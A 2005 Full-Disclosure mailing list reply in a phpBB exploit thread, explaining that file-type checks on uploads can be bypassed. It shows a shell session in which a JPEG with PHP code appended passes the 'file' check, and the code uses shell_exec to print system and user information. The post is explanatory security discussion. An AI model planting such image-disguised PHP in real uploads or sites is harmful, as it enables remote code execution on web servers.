[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit.
- To: Paul Laudanski <zx@xxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit.
- From: Nicob <nicob@xxxxxxxxx>
- Date: Thu, 27 Oct 2005 15:23:12 +0200
Le mardi 25 octobre 2005 à 17:02 -0400, Paul Laudanski a écrit :
>
> Anyone have other ideas on this? I've already implemented some code
> to validate file input and its working. But is this the right
> approach?
I'm not sure to understand what you're talking about but if you're
trying to positively validate that file XYZ is an image and not a PHP
file, you're asking for trouble :
$> wget http://nicob.net/mirrors/blowjob.jpg
$> file blowjob.jpg
blowjob.jpg: JPEG image data, JFIF standard 1.0
$> tail -n 5 blowjob.jpg
<?php
$resu = shell_exec("echo '' && echo '' && uname -a && id && date");
echo nl2br($resu);
?>
$> php blowjob.jpg
[garbage] Linux dellyre 2.6.[...] jeu oct 27 15:21:31 CEST 2005 [...]
Nicob
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/